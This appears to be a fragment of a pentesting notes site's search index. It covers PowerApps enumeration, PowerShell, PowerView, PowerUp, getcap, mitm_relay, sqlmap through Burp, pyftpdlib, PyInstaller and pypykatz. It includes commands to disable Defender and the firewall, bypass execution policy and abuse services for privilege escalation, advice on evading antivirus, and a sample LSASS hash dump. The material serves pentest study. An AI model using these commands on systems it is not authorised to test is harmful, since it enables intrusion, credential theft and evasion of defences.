                        ","tags":["database","cheat","sheet"]},{"location":"powerapps-pentesting/#basics-on-powerapps","title":"Basics on PowerApps","text":"

                        Power Apps is a collection of services, apps, and connectors that work together to let you do much more than just view your data. You can act on your data and update it anywhere and from any device.

                        Power Apps Home Page: If you are building an app, you'll start with the Power Apps Home Page. You can build apps from sample apps, templates, or a blank screen.

                        Power Apps Studio: Power Apps Studio is where you can fully develop your apps to make them more effective as a business tool and to make them more attractive:

                        • Left pane - Shows a hierarchical view of all the controls on each screen or a thumbnail for each screen in your app.
                        • Middle pane - Shows the canvas app that you're working on.
                        • Right pane - Where you set options such as the layout, properties, and data sources for certain controls.

                        Microsoft Power Platform admin center: Microsoft Power Platform admin center is the centralized place for managing Power Apps for an organization. On this site, you can define and manage different environments to house the apps. For example, you might have separate environments for development and production apps. Additionally, you can define data connections and manage environment roles and data policies.

                        ","tags":["database","cheat","sheet"]},{"location":"powerapps-pentesting/#simple-data-application","title":"Simple data application","text":"

                        You just need to connect a spreadsheet with a table. What you connect is the table. PowerApps synchronizes your application by adding an id column to the table in your spreadsheet.

                        Your new app will have three components:

                        • Listing page screen.
                        • Details screen
                        • CRUE operations on records: Edit record, Add new record, Delete record.

                        Each item/record corresponds with a row from your connected spreadsheet. Galleru is a representation of a list of records that's pulling from a connected table.

                        Saving the application: by default Microsoft will safe your app, but for that to happen you first need it to save it for the first time.

                        Tree view displays all the screen of your application. Under the screen level you have the elements that compose your screen. Elements can have sub elements.

                        Properties

                        Elements have properties. Properties can be set statically or dynamically. Dynamically set properties open the door for users updating values or things like resizing elements based on height, for instance.

                        # This references to the connected spreadsheet column name\nThisItem.HeadingColumnName \n\n#  This will reference to the value inserted in that element.\nNameofElement.Default \n

                        Additionally, you have formatting functions, like for instance the Text function, that can be applied to a property (dynamically or statically established).

                        # Format element to mm/dd/yyyy \nText(ThisItem.HeadingColumnName, \"mm/dd/yyyy\" )\n\n# Concatenate elements \nConcatenate (ThisItem.HeadingColumnName, ThisItem.HeadingColumnName2)\n# For instance:  Concatenate (ThisItem.FirsName, ThisItem.LastName)\n\nConcatenate (NameofElement.Default,  NameofElement2.Default)  \n# For instance: Concatenate (First_Name_Card.Default, Last_Name_Card.Default)  \n

                        A data card has a property called UPDATE. This is useful in forms or user input, in which what you finally submit to the database is not their input but the result of that input after the UPDATE transformation has taken place.

                        Basically what happens is when you click the check mark, what it's basically doing is it's using the update property of each of the data cards here, and actually submitting it to the underlying data itself.

                        More properties:

                        • DisplayMode. This can be set to View, Edit... You can granularly set the property of an element to View (so no edition is possible). Or you can set that property for their parent.

                        Triggers

                        Elements have properties and triggers. Triggers is an action that an user perform on an element. They are quite similar to those actions called in javascript (onload, onselect,...).

                        Configuring a triggers: you basically select an element (button), set the action you want (onclick) and the function you want to assign it (submit). You can separate actions with \";\".

                        Triggers help you build the functionality of your application. For instance, in this basic app, navigation from one screen to another is actioned with a Navigate trigger. Or, for instance, starting the application is a trigger itself.

                        Formulas and functions

                        Formula Reference for PowerApps

                        Canvas application

                        Building an application from scratch.

                        A common practice, to have a master screen and a document screen: First thing you do is creating a master screen that will be used as a template for the rest of your screens in your application. The second thing you will do is creating a screen named Documentation. Master screen will be to create elements in your app. Documentation will be for assigning style to those elements. Master screen elements will reference Document screen.

                        Variables in Powerapps are different from variables in programmed languages. There 3 types:

                        • Contextual variables: Variables is only active when you are on the screen.
                        • Global variables: they are accessible from all screens in the application.
                        • Collection variables.

                        How to set up a contextual variable. Select an element in the screen. Select \"OnSelect\" and add the function:

                        UpdateContext({FirstNumber: TextInput.Text})\n# When you select an element, for instance an input field, it will create a variable called FirstNumber and it will assign it the value of the input field that you have selected\n

                        How to set up a global variable. By using the SET function

                        Set(CounterGlobal, CounterGlobal+1)\n

                        Collections variable are useful for datatables and galleries.

                        Example. Create a button and OnSelect that button add this function:

                        Collect(OurCollection, {First: \"Ben\", Second: \"Dover\"})\n# that it's creating a collection called our collection. It's creating two columns in that. The first column is called first. The second column is called second. And the first record in the first column is Ben, and the first record in the second column is called Dover.\n

                        Create a Gallery, and as Data source, add your collection. This way everytime you click on that button you will be adding \"Ben\" and \"Dover\" as a card to that gallery. Of course you can substitute those two static texts to references to inputs fields:

                        Collect(OurCollection, {First: \"TextInput4.Text\", Second: \"TextInput5.Text\"})\n

                        To remove an item from a collection, add a icon-button for removing and onSelect:

                        Remove(OurCollection, ThisItem)\n

                        Filtering cards displayed in a gallery. Select the Gallery, onSelect:

                        Search(NameOfTable, <ElementToSearch>, <WhichColumnsSearchinTable>)\n\n# For example, to display all cards in connected table \"Table1\":\nSearch(Table1, \"\", \"FirstName\")\n\n# To make it dependable on user's input, create an input field and\nSearch(Table1, TexInput1.Text, \"FirstName\", \"LastName\", \"Location\")\n

                        Only show the search input if someone click on the search icon.

                        • Set the Input search box default visibility to False.
                        • Insert a magnifier icon. OnSelect:

                          UpdateContext({SearchVisible: True})\n
                        • Modify the search input field. When Visible:

                          SearchVisible\n

                        To trigger SearchVisible to false (and hide search input field), we will modify the magnifier icon, onSelect:

                        ```\nUpdateContext({SearchVisible: !SearchVisible})\n```\n

                        More interesting formulas is Filter

                        # An example of a multi-layered built function, with Filter and Search functionality. Create a dropdown menu > Items\nFilter(Search(Table1, TexInput1.Text, \"FirstName\", \"LastName\", \"Location\"), VIPLevel = Dropdown.Selected.Value)\n

                        And also SubmitForm, which aggregates all the updates in a form control and submits the form.

                        SubmitForm(FormName)\n
                        ","tags":["database","cheat","sheet"]},{"location":"powerapps-pentesting/#well-known-vulnerabilities-under-build","title":"Well-known vulnerabilities (under build)","text":"","tags":["database","cheat","sheet"]},{"location":"powerapps-pentesting/#data-exposure","title":"Data exposure","text":"

                        https://rencore.com/en/blog/how-to-prevent-the-next-microsoft-power-apps-data-leak-from-happening

                        From https://dev.to/wyattdave/ive-just-been-hacked-by-a-power-app-1fj4

                        ","tags":["database","cheat","sheet"]},{"location":"powerapps-pentesting/#not-using-service-accounts","title":"Not using Service accounts","text":"

                        The security issue is all around how the Power Platform handles credentials, with each user/owner signing in and storing their credentials in connections. Meaning that if you share a flow created with your user, your are sharing your connections (aka credentials).

                        One way to prevent this issue is by using service accounts.

                        ","tags":["database","cheat","sheet"]},{"location":"powerapps-pentesting/#sharing-flows","title":"Sharing flows","text":"

                        If you need to share a flow:

                        • Use send a copy or
                        • share a flow as a run only user (as that requires their credentials).
                        ","tags":["database","cheat","sheet"]},{"location":"powerapps-pentesting/#configuring-connections-to-the-least-privilege","title":"Configuring connections to the least privilege","text":"

                        When configuring a flow, don't include additional unnecessary connections in any flow. As per Powerapps works, this situation may happen:

                        A connection set to the highest privilege (you share read calendar and you give write access to emails).

                        A wa This has its strengths, as all credentials are securely stored and accessing apps/ running flows is easy as the Power Platform handles everything. The problem comes when you share flows, as what you might not realise is you are sharing your connections (aka credentials) with that user. They may not be able to see your credentials, but that doesn't mean they cant use them in a way that you didn't want. And what's worse is there is no granularity in connections, so an Outlook connection used for reading events can be used to delete emails.

                        ","tags":["database","cheat","sheet"]},{"location":"powerapps-pentesting/#protecting-powerapps-with-microsoft-sentinel","title":"Protecting PowerApps with Microsoft Sentinel","text":"

                        As Power Platform is part of the Microsoft offering, Microsoft Sentinel adresses many security issues:

                        • Collect\u00a0Microsoft Power Platform and Power Apps activity logs, audits, and events into the Microsoft Sentinel workspace.
                        • Detect\u00a0execution of suspicious, malicious, or illegitimate activities within Microsoft Power Platform and Power Apps.
                        • Investigate\u00a0threats detected in Microsoft Power Platform and Power Apps and contextualize them with additional user activities across the organization.
                        • Respond\u00a0to Microsoft Power Platform-related and Power Apps-related threats and incidents in a simple and canned manner manually, automatically, or via a predefined workflow.

                        Data connectors for Microsoft Sentinels

                        Connector Name Covered Logs / Inventory Power Platform Inventory (using Azure Functions) Power Apps and Power Automate inventory data Microsoft Power Apps (Preview) Power Apps activity logs Microsoft Power Automate (Preview) Power Automate activity logs Microsoft Power Platform Connectors (Preview) Power Platform connector activity logs Microsoft Power Platform DLP (Preview) Data loss prevention activity logs Dynamics365 Dataverse and model-driven apps activity logging

                        Sentinel rules for protecting PowerApps platform:

                        Rule name What does it detect? PowerApps - App activity from unauthorized geo Identifies Power Apps activity from countries in a predefined list of unauthorized countries. PowerApps - Multiple apps deleted Identifies mass delete activity where multiple Power Apps are deleted within a period of 1 hour, matching a predefined threshold of total apps deleted or app deletes events across multiple Power Platform environments. PowerApps - Data destruction following publishing of a new app Identifies a chain of events where a new app is created or published, that is followed by mass update or delete events in Dataverse within 1 hour. The incident severity is raised if the app publisher is on the list of users in the TerminatedEmployees watchlist template. PowerApps - Multiple users accessing a malicious link after launching new app Identifies a chain of events, where a new Power App is created, followed by multiple users launching the app within the detection window and clicking on the same malicious URL. PowerAutomate - Departing employee flow activity Identifies instances where an employee who has been notified or is already terminated creates or modifies a Power Automate flow. PowerPlatform - Connector added to a Sensitive Environment Identifies occurrences of new API connector creations within Power Platform, specifically targeting a predefined list of sensitive environments. PowerPlatform - DLP policy updated or removed Identifies changes to DLP policy, specifically policies which are updated or removed.","tags":["database","cheat","sheet"]},{"location":"powerapps-pentesting/#attacks","title":"Attacks","text":"

                        Install m365 CLI.

                        ","tags":["database","cheat","sheet"]},{"location":"powerapps-pentesting/#ennumeration-techniques","title":"Ennumeration techniques","text":"

                        Get information about the default Power Apps environment.

                        m365 pa environment get  \n

                        List Microsoft Power Apps environments in the current tenant

                        m365 pa environment list \n

                        List all available apps for that user

                        m365 pa app list  \n

                        List all apps in an environment as Admin

                        m365 pa app list --environmentName 00000000-0000-0000-0000-000000000000 --asAdmin  \n

                        Remove an app

                        m365 pa app remove --name 00000000-0000-0000-0000-000000000000  \n

                        Removes the specified Power App without confirmation

                        m365 pa app remove --name 00000000-0000-0000-0000-000000000000 --force  \n

                        Removes the specified Power App you don't own

                        m365 pa app remove --name 00000000-0000-0000-0000-000000000000 --environmentName Default- 00000000-0000-0000-0000-000000000000 --asAdmin  \n

                        Add an owner without removing the old one

                        m365 pa app owner set --environmentName 00000000-0000-0000-0000-000000000000 --appName 00000000-0000-0000-0000-000000000000 --userId 00000000-0000-0000-0000-000000000000 --roleForOldAppOwner CanEdit  \n

                        Export an app

                        m365 pa app export --environmentName 00000000-0000-0000-0000-000000000000 --name 00000000-0000-0000-0000-000000000000 --packageDisplayName \"PowerApp\" --packageDescription \"Power App Description\" --packageSourceEnvironment \"Pentesting\" --path ~/Documents\n
                        ","tags":["database","cheat","sheet"]},{"location":"powercat/","title":"Powercat - An alternative to netcat coded in PowerShell","text":"

                        Netcat comes pre-installed in most Linux distributions. There is also a version for windows: download from https://nmap.org/download.html.

                        As for Windows machines, there's an alternative to netcat coded in PowerShell called PowerCat.

                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"powershell/","title":"Powershell","text":""},{"location":"powershell/#basic-commands","title":"Basic commands","text":"
                        # List users of Administrator group\nnet localgroup Administrators\n\n\n\n# List contents\ndir\nGet-ChildItem -Force\n# -Force: Display hidden files \n\n\n# Print working directory\npwd\nGet-Location\n\n# Change directory\ncd\ncd ..           // it gets you up one level\ncd ..\\brotherdirectory  // go to a brother directory\ncd ~\\Desktop        // go to logged user's Desktop\n\n# Creates folder\nmkdir nameOfFolder\nNew-Item -ItemType Directory nameOfDirectory\n\n# Display all commands saved in a file\nhistory\nGet-history\n\n# Browse the command history\nCTRL-R\n\n# Clear screen\nclear\nClear-Host\n\n# Copy item\ncp nameOfSource nameOfDestiny\nCopy-Item nameOfSource nameOfDestiny\n\n# Copy a folder and its content\ncp originFolder destinyPath -Recurse\nCopy-Item originFolder destinyPath -Recurse\n\n# Get running processes filtered by name\nget-process -name ccSvcHst\n\n# Kill processes called ccSvcHst* // Notice here wild card *\ntaskkill /f /im ccSvcHst*\n\n# Remove a file\nrm nameofFile -Recurse\n# -Recurse: Remove it recursively (in a folder)\n\n# Display content of a file\ncat nameofFile\nGet-Content nameofFile\n\n# Display one page of a file at a time\nmore nameofFile\n\n# Display the first lines of a file\nhead nameofFile\n\n# Open a file with an app\nstart nameofApp nameofFile\n\n# Runs commands or expressions on the local computer.\n$Command = \"Get-Process\"\nInvoke-Expression $Command\n\n# PS uses Invoke-Expression to evaluate the string. Otherwise the output of $Command would be the text \"Get-Process\". Invoke-Expression is similar to $($command) in linux.\n# IEX is an alias\n\n# Deactivate antivirus from powershell session (if user has rights to do so)\nSet-MpPreference -DisableRealtimeMonitoring $true\n\n# Disable firewall\nnetsh advfirewall set allprofiles state off\n\n\n# Add a registry\nreg add HKLM\\System\\CurrentControlSet\\Control\\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f\n
                        "},{"location":"powershell/#powershell-wildcards","title":"Powershell wildcards","text":"

                        The four types of Wildcard:

                        The * wildcard will match zero or more characters

                        The ? wildcard will match a single character

                        [m-n] Match a range of characters from m to n, so [f-m]ake will match fake/jake/make

                        [abc] Match a set of characters a,b,c.., so [fm]ake will match fake/make

                        "},{"location":"powershell/#filters","title":"Filters","text":"

                        Filters are a way to power up our queries in powershell.

                        Example: We can use the Filter parameter with the notlike operator to filter out all Microsoft software (which may be useful when enumerating a system for local privilege escalation vectors).

                        get-ciminstance win32_product -Filter \"NOT Vendor like '%Microsoft%'\" | fl\n

                        The Filter operator requires at least one operator:

                        Filter Meaning -eq Equal to -le Less than or equal to -ge Greater than or equal to -ne Not equal to -lt Less than -gt Greater than -approx -bor Bitwise OR -band Bitwise AND -recursivematch Recursive match -like Like -notlike Not like -and Boolean AND -or Boolean OR -not Boolean NOT"},{"location":"powershell/#filter-examples-ad-object-properties","title":"Filter Examples: AD Object Properties","text":"

                        The filter can be used with operators to compare, exclude, search for, etc., a variety of AD object properties. Filters can be wrapped in curly braces, single quotes, parentheses, or double-quotes. For example, the following simple search filter using Get-ADUser to find information about the user \"Sally Jones\" can be written as follows:

                        Get-ADUser Filter \"name -eq 'sally jones'\"\nGet-ADUser -Filter {name -eq 'sally jones'}\nGet-ADUser -Filter 'name -eq \"sally jones\"'\n

                        As seen above, the property value (here, sally jones) can be wrapped in single or double-quotes.

                        # The asterisk (`*`) can be used as a wildcard when performing queries. \nGet-ADUser -filter {-name -like \"joe*\"}\n# it return all domain users whose name start with `joe` (joe, joel, etc.).\n
                        "},{"location":"powershell/#escaping-characters","title":"Escaping characters","text":"

                        When using filters, certain characters must be escaped:

                        Character Escaped As Note \u201c `\u201d Only needed if the data is enclosed in double-quotes. \u2018 \\\u2019 Only needed if the data is enclosed in single quotes. NULL \\00 Standard LDAP escape sequence. \\ \\5c Standard LDAP escape sequence. * \\2a Escaped automatically, but only in -eq and -ne comparisons. Use -like and - notlike operators for wildcard comparison. ( /28 Escaped automatically. ) /29 Escaped automatically. / /2f Escaped automatically."},{"location":"powershell/#basic-commands-for-reconnaissance","title":"Basic commands for reconnaissance","text":"
                        # Display Powershell relevant Powershell version information\necho $PSVersion\n\n# Check current execution policy. If the answer is\n# - \"Restricted\": Ps scripts cannot run.\n# - \"RemoteSigned\": Downloaded scripts will require the script to be signed by a trusted publisher.\nGet-Execution-Policy\n\n# Bypass execution policy\npowershell -ep bypass\n\n#You can tell if PowerShell is running with administrator privileges (a.k.a \u201celevated\u201d rights) with the following snippet:\n[Security.Principal.WindowsIdentity]::GetCurrent().Groups -contains 'S-1-5-32-544'\n# [Security.Principal.WindowsIdentity]::GetCurrent() - Retrieves the WindowsIdentity for the currently running user.\n# (...).groups - Access the groups property of the identity to find out what user groups the identity is a member of.\n# -contains \"S-1-5-32-544\" returns true if groups contains the Well Known SID of the Administrators group (the identity will only contain it if \u201crun as administrator\u201d was used) and otherwise false.\n\n\n# List which processes are elevated:\nGet-Process | Add-Member -Name Elevated -MemberType ScriptProperty -Value {if ($this.Name -in @('Idle','System')) {$null} else {-not $this.Path -and -not $this.Handle} } -PassThru | Format-Table Name,Elevated\n\n# List installed software on a computer\nget-ciminstance win32_product | fl\n\n\n# Gets content from a web page on the internet.\nInvoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1\n# alias: `iwr`, `curl`, and `wget`\n
                        "},{"location":"powershell/#disk-management","title":"Disk Management","text":"
                        # Show disks\nGet-Disk\n\n# Show disks in a more humanly mode\nGet-disk | FT -AutoSize\n\n# Show partitions from a disk\nGet-Partition -DiskNumber 1\n\n# Create partition\nNew-Partition -DiskNumber 1 -Size 50GB -AssignDriveLetter\n\n# Show volume\nGet-volume -DriveLetter e\n\n# Format Disk and assign file system\nFormat-volume -DriveLetter E -FileSystem NTFS\n\n# Delete Partition \nRemove-Partition -DriveLetter E\n
                        "},{"location":"powershell/#disk-management-with-diskpart","title":"Disk Management with diskpart","text":"

                        Diskpart is a command interpreter that helps you manage your computer's drivers. How it works? Before using diskpart commands, you usually have to list and select the object you want to operate on.

                        # To enter in diskpart command interpreter\ndiskpart\n\n# Enumerate disk\nlist disk\n\n# Select disk\nselect disk 0\n\n# Enumerate volumes\nlist volume\n\n# Select volume\nselect volume 1\n\n# Enumerate partitions\nlist partition\n\n# Select partition\nselect partition 2\n\n# Extend a volume (once you have it selected)\nextend size=2048\n\n# Shring a volume (once you have it selected)\nshrink desired=2048\n
                        "},{"location":"powershell/#howtos","title":"Howtos","text":""},{"location":"powershell/#how-to-delete-shortcuts-from-public-desktop","title":"How to delete shortcuts from Public Desktop","text":"
                        # Instead of \"everyone\" set the group that you prefer\n$acl = Get-ACL \u201cC:\\Users\\Public\\Desktop\u201d\n\n$rule=new-object System.Security.AccessControl.FileSystemAccessRule (\u201ceveryone\u201d,\u201dFullControl\u201d, \u201cContainerInherit,ObjectInherit\u201d, \u201cNone\u201d, \u201cAllow\u201d)\n\n$acl.SetAccessRule($rule)\n\nSet-ACL \u201cC:\\Users\\Public\\Desktop\u201d $acl\n
                        "},{"location":"powershell/#how-to-uninstall-winzip-from-powershell-line-of-command","title":"How to uninstall winzip from powershell line of command","text":"
                        # Show all software installed:\nGet-WmiObject\u00a0-Class\u00a0win32_product\n\n# Find winzip object\nGet-WmiObject\u00a0-Class\u00a0win32_product |\u00a0where\u00a0{\u00a0$_.Name\u00a0-like\u00a0\"*Winzip*\"}\n\n# Create a variable for  the object\n$wzip\u00a0=\u00a0Get-WmiObject\u00a0-Class\u00a0win32_product |\u00a0where\u00a0{\u00a0$_.Name\u00a0-like\u00a0\"*Winzip*\"}\n\n# Uninstall it:\nmsiexec /x\u00a0\u00a0$wzip.localpackage /passive\n

                        This will start un-installation of Winzip and will show only the Progress bar only {because we are using msiexex\u2019s /passive switch\u201d

                        "},{"location":"powerup/","title":"PowerUp.ps1","text":"

                        Run from powershell.

                        ","tags":["active directory","ldap","windows","privilege escalation","tools"]},{"location":"powerup/#installation","title":"Installation","text":"

                        Download from PowerSploit Github repo: https://github.com/ZeroDayLab/PowerSploit.

                        Import-Module .\\PowerUp.ps1\n
                        ","tags":["active directory","ldap","windows","privilege escalation","tools"]},{"location":"powerup/#basic-commands","title":"Basic commands","text":"
                        # Find services vulnerables in my machine\nInvoke-AllChecks\n\n# Exploit a vulnerable service to escalate to the more privilege user that runs that service\nInvoke-ServiceAbuse -Name \u2018<NAME OF THE SERVICE>\u2019 -UserName \u2018<DOMAIN CONTROLLER>\\<MY CURRENT USERNAME>\u2019\n
                        ","tags":["active directory","ldap","windows","privilege escalation","tools"]},{"location":"powerview/","title":"powerview.ps1","text":"
                        ---\n

                        title: Powerview.ps1 author: amandaguglieri draft: false TableOfContents: true tags: - active directory - ldap - windows - enumeration - reconnaissance - tools

                        "},{"location":"powerview/#powerviewps1","title":"Powerview.ps1","text":"

                        Run from powershell.

                        Download from PowerSploit Github repo: https://github.com/ZeroDayLab/PowerSploit.

                        Import-Module .\\Powerview.ps1\u00a0\n
                        "},{"location":"powerview/#enumeration-cheat-sheet","title":"Enumeration cheat sheet","text":"
                        # Enumerate users\nGet-NetUser\n\n# Enumerate computers in the domain\nGet-NetComputer \nGet-NetComputer | select name\nGet-NetComputer -OperatingSystem \"Linux\"\n\n# Display info of current domain. Pay attention to the element forest, to see if there is a bigger structure\nGet-NetDomain\n\n# Get the ID for the current Domain (useful later for crafting Golden tickets)\nGet-DomainID\n\n# Display policies for the Domain and accounts, including for instance LockoutBadAccounts\nGet-DomainPolicy\n\n# Display Domain controller\nGet-NetDomainController\n\n# List users in the domain. Useful to search for non expiring passwords, groups belonging, what's their SPN, last time they changed their password... \nGet Net-User\nGet Net-User john.doe\n\n# List users associated to an Service Principal Name (SPN) \nGet Net-User -SPN\n\n# List groups in the domain\nGet-NetGroup\n\n# List Group Policy Objects in domain\nGet-NetGPO\n\n# List Domain Trusts\nGet-NetDomainTrust\n
                        "},{"location":"process-capabilities-getcap/","title":"Process capabilities: getcap","text":"

                        Linux capabilities provide a subset of the available root privileges to a process. For the purpose of performing permission checks, traditional UNIX implementations distinguish two categories of processes: privileged processes (whose effective user ID is 0, referred to as superuser or root), and unprivileged processes (whose effective UID is nonzero). Privileged processes bypass all kernel permission checks, while unprivileged processes are subject to full permission checking based on the process's credentials (usually: effective UID, effective GID, and supplementary group list).

                        In Linux, files may be given specific capabilities. For example, if an executable needs to access (read) files that are only readable by root, it is possible to give that file this \u2018permission\u2019 without having it run with complete root privileges. This allows for a more secure system in general.

                        getcap and setcap are used to view and set capabilities, respectively. They usually belong to the libcap2-bin package on debian and debian-based distributions.

                        Scan all files in system and check capabilities:

                        getcap -r / 2>/dev/null\n

                        Check what every capability means in https://linux.die.net/man/7/capabilities

                        Knowing what capability is assigned to a proccess, try to make the best of it to escalate privileges.

                        Example in HackTheBox: nunchucks in which perl command has \" cap_setuid+ep\" capabilities, which means that at some point may run as sudo.

                        ","tags":["privilege escalation","linux"]},{"location":"process-capabilities-getcap/#labs","title":"Labs","text":"

                        HackTheBox: nunchucks

                        ","tags":["privilege escalation","linux"]},{"location":"process-capabilities-getcap/#resources","title":"Resources","text":"

                        Hacktricks

                        https://nxnjz.net/2018/08/an-interesting-privilege-escalation-vector-getcap/

                        ","tags":["privilege escalation","linux"]},{"location":"process-hacker-tool/","title":"Process Hacker tool","text":"","tags":["thick client application"]},{"location":"process-hacker-tool/#usage","title":"Usage","text":"

                        In the course Pentesting thick clients applications.

                        We will be using the portable version.

                        1. Open the application you want to test.

                        2. Open Process Hacker Tool.

                        3. Select the application, click right on \"Properties\".

                        4. Select tab \"Memory\".

                        5. Click on \"Strings\".

                        6. Check \"Image\" and \"Mapped\" and search!

                        7. In the results you can use the Filter option to search for (in this case) \"data source\".

                        Other possible searches: Decrypt. Clear text conection string in memory reveals credentials: powned!!!

                        ","tags":["thick client application"]},{"location":"proxies/","title":"Proxies","text":"

                        A proxy is when a device or service sits in the middle of a connection and acts as a mediator.

                        • HTTP Proxies: BurpSuite
                        • Postman, mitm_relay
                        • SOCKS/SSH Proxy (for pivoting): Chisel, ptunnel, sshuttle.

                        There are many types of proxy services, but the key ones are:

                        • Dedicated Proxy/Forward Proxy: The Forward Proxy, is what most people imagine a proxy to be. A Forward Proxy is when a client makes a request to a computer, and that computer carries out the request. For example, in a corporate network, sensitive computers may not have direct access to the Internet. To access a website, they must go through a proxy (or web filter).
                        • Reverse Proxy: As you may have guessed, a reverse proxy, is the reverse of a Forward Proxy. Instead of being designed to filter outgoing requests, it filters incoming ones. The most common goal with a Reverse Proxy, is to listen on an address and forward it to a closed-off network. Many organizations use CloudFlare as they have a robust network that can withstand most DDOS Attacks.
                        • Transparent Proxy
                        "},{"location":"proxies/#setting-up-postman-with-burpsuite","title":"Setting up Postman with BurpSuite","text":"

                        1 - Postman > Settings

                        2 - Proxy tab. Check:

                        • Use the system proxy
                        • Add a custom proxy configuration
                        • HTTP
                        • HTTPS
                        • 127.0.0.1
                        • 8080

                        3 - BurpSuite. Settup proxy listener

                        4 - Burp Suite. Intercept mode on

                        5 - Postman. Send the interesting request from your collection

                        6 - Your BurpSuite will intercept that traffic. Now you can send it to Intruder, Repeater, Sequencer...

                        "},{"location":"proxies/#setting-up-mitm_relay-with-burpsuite","title":"Setting up mitm_relay with Burpsuite","text":"

                        In DVTA we will configure the server to the IP of the local machine. In my lab set up my IP was 10.0.2.15.

                        In FTP, we will configure the listening port to 2111. Also we will disable IP check for this lab setup to work.

                        From https://github.com/jrmdev/mitm_relay:

                        This is what we're doing:

                        1. DVTA application sends traffic to port 21, so to intercept it we configure MITM_relay to be listening on port 21.

                        2. mitm_relay encapsulates the application traffic )no matter the protocol, into HTTP protocol so BurpSuite can read it

                        3. Burp Suite will read the traffic. And we can tamper here our code.

                        4. mitm_relay will \"unfunnel\" the traffic from the HTPP protocol into the raw one

                        5. In a lab setup FTP server will be in the same network, so to not get in conflict with mitm_relay we will modify FTP listen port to 2111. In real life this change is not necessary

                        Running mitm_relay:

                        python mitm_relay.py -l 0.0.0.0 -r tcp:21:10.0.2.15:2111 -p 127.0.0.1:8080\n# -l listening address for mitm_relay (0.0.0.0 means we all listening in all interfaces)\n# -r relay configuration: <protocol>:<listeningPort>:<IPofDestinationserver>:<listeningPortonDestinationServer>\n# -p Proxy configuration: <IPofProxy>:<portOfProxy> \n

                        And this is how the interception looks like:

                        "},{"location":"proxies/#burpsuite-sqlmap","title":"Burpsuite + sqlmap","text":""},{"location":"proxies/#from-burpsuite","title":"From Burpsuite","text":"

                        Browse the application to capture the generating csfr request in your traffic.

                        Open Settings, go to tab Session and scroll down to the section Macros.

                        Click on \"Add\" (a macro.) You will see the already captured requests.

                        Select the request in which the csrt is created/refreshed (and still not used) and click on OK.

                        Name your macro in the window \"Macro Editor,\" for instance GET_csrf, and select \"Configure item\".

                        Now you indicate to Burpsuite where the value of the CSRF is shown in the response. Don't forget to add the name of the parameter. Click on OK.

                        Click on OK in the window \"Macro editor\".

                        You are again in the Setting>Sessions section. Macro section is at the bottom of the page. Now we are going to configure the section \"Session handling rules\":

                        Click on \"Add\" (a rule,) and the \"Session handling rule editor\" will open.

                        • In Rule description write: PUT_CSRF
                        • In Rule actions, click on \"Add > Run a macro.\"
                        • New window will open for defining the action performed by the macro:
                          • Select the macro GET_csrf.
                          • Select the option \"Update only the following parameter,\" and add in there the name we used before when defining where the token was, \"csrf.\"
                          • In the top menu, select the tab \"Scope,\" and add the url within scope.
                          • IMPORTANT: In Tools Scope, select the module \"Proxy.\" This will allow sqlmap request to be routed.
                        "},{"location":"proxies/#from-sqlmap","title":"From Sqlmap","text":"

                        Create a file that contains the request that is vulnerable to SQLi and save it.

                        Then:

                        sqlmap -r request.txt -p id --proxy=http://localhost:8080 --current-db --flush sessions -vv \n

                        Important: Flag --proxy sends the request via Burpsuite.

                        For Blind injections you need to specify other parameters such as risk and level.

                        "},{"location":"pyftpdlib/","title":"pyftpdlib","text":"

                        A simple FTP server written in python

                        ","tags":["pentesting","windows","ftp server","python"]},{"location":"pyftpdlib/#installation","title":"Installation","text":"
                        sudo pip3 install pyftpdlib\n
                        ","tags":["pentesting","windows","ftp server","python"]},{"location":"pyftpdlib/#basic-usage","title":"Basic usage","text":"

                        By default pyftpdlib uses port 2121. With --port flag, indicate a different port. Anonymous authentication is enabled by default if we don't set a user and password.

                        sudo python3 -m pyftpdlib --port 21\n

                        With the option --write to allow clients to upload files to our attack host:

                        sudo python3 -m pyftpdlib --port 21 --write\n
                        ","tags":["pentesting","windows","ftp server","python"]},{"location":"pyinstaller/","title":"Pyinstaller","text":"

                        PyInstaller reads a Python script written by you. It analyzes your code to discover every other module and library your script needs in order to execute. Then it collects copies of all those files \u2013 including the active Python interpreter! \u2013 and puts them with your script in a single folder, or optionally in a single executable file.

                        ","tags":["pentesting","python"]},{"location":"pyinstaller/#installation","title":"Installation","text":"
                        pip install pyinstaller\n
                        ","tags":["pentesting","python"]},{"location":"pyinstaller/#usage","title":"Usage","text":"
                        pyinstaller /path/to/yourscript.py\n

                        But the real power of pyinstaller is when it comes to onefile script generation. Additionally, pyinstaller provides a flag to avoid consoles from opening.

                        pyinstaller --onefile --windowed /path/to/yourscript.py\n

                        IF\u00a0the antivirus (signature based) is able to catch the EXE even before opening it, then you need to change the packaging method as that would change the signature of the exported EXE.

                        Pyinstaller uses UPX\u00a0to compress the size of the EXE output. So it's worth to try with

                        pyinstaller --onefile --windowed /path/to/yourscript.py --noupx\u00a0 \u00a0\n\n# --noupx: Do not use UPX\n

                        Or even other software to export into EXE.

                        IF\u00a0the antivirus (heuristic based) did catch your exe after opening it, then you need to change the structure or the order of your source code:

                        • Add some random delay.
                        • Add some random operations like create a text file, append random text and then delete the file.
                        • Change the order of doing things.
                        • Offload some operations/commands to subprocess.

                        Tips:

                        Never blindly rely on Anti-Virus Sandbox Vmware to test an EXE.

                        ","tags":["pentesting","python"]},{"location":"pypykatz/","title":"pypykatz","text":"

                        Mimikatz implementation in pure Python. Runs on all OS's which support python>=3.6

                        ","tags":["windows","dump hashes","passwords"]},{"location":"pypykatz/#installation","title":"Installation","text":"

                        Download from github repo: https://github.com/skelsec/pypykatz.

                        ","tags":["windows","dump hashes","passwords"]},{"location":"pypykatz/#basic-usage","title":"Basic usage","text":"
                        pypykatz lsa minidump /home/path/lsass.dmp \n

                        From results, and as an example, we will have this snip:

                        sid S-1-5-21-4019466498-1700476312-3544718034-1001\nluid 1354633\n    == MSV ==\n        Username: bob\n        Domain: DESKTOP-33E7O54\n        LM: NA\n        NT: 64f12cddaa88057e06a81b54e73b949b\n        SHA1: cba4e545b7ec918129725154b29f055e4cd5aea8\n        DPAPI: NA\n

                        MSV is an authentication package in Windows that LSA calls on to validate logon attempts against the SAM database. Pypykatz extracted the SID, Username, Domain, and even the NT & SHA1 password hashes associated with the bob user account's logon session stored in LSASS process memory.

                        But also, these others:

